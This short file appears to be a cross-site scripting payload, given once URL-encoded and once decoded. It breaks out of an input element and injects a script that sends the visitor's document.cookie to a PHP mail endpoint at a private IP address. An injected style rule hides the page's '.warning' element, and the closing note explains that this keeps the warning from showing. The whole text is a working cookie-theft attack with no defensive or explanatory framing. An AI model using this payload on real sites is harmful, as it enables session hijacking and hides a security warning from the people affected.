%22%3C%2Finput%3E%3Cscript%3Ejavascript%3Avoid((new%20Image()).src%3D%27http%3A%2F%2F192.168.76.130%2Fsendmail.php%3F%27%20%2B%20%27to%3D19930127zpf%40sjtu.edu.cn%27%20%2B%20%27%26payload%3D%27%20%2B%20encodeURIComponent(document.cookie)%20%2B%20%27%26random%3D%27%20%2B%20Math.random())%3B%3C%2Fscript%3E%0A%3Cstyle%3E%0A.warning%20%7Bdisplay%3Anone%7D%0A%3C%2Fstyle%3E%0A%3Ca%20href%3D%22



"</input><script>javascript:void((new Image()).src='http://192.168.76.130/sendmail.php?' + 'to=19930127zpf@sjtu.edu.cn' + '&payload=' + encodeURIComponent(document.cookie) + '&random=' + Math.random());</script>
<style>
.warning {display:none}
</style>
<a href="



note: redefine ".warning" so the warning will not be displayed.
